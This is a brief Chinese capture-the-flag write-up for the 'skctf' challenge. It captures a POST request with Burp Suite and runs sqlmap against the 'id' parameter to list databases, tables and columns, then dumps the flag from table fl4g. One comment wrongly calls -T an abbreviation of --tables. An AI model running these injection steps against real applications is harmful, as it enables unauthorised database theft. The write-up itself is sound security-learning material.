使用BurpSuite对post抓包
复制Raw内容进txt文件用于sql注入
这里我把包里的信息复制出来保存为post.txt
看抓到的包最下面是id,选择注入点为:id 开始进行注入
sqlmap -r 'post.txt' -p id --dbs //列出所有的数据库名称
很明显应该就是‘skctf’
sqlmap -r 'post.txt' -p id -D skctf --tables
// -D选择数据库
// --tables列出表单
// 爆破指定数据库下的表名
等一会就出表了
继续执行
sqlmap -r 'post.txt' -p id -D skctf -T fl4g --columns
// -T选择表
// --tables缩写成 -T
// --columns列出‘fl4g’表中的所有列
直接展示skctf_flag中的值即可
sqlmap -r 'post.txt' -p id -D skctf -T fl4g -C 'skctf_flag' --dump
// --columns缩写成 -C
// --dump获取表中的列里的字段数据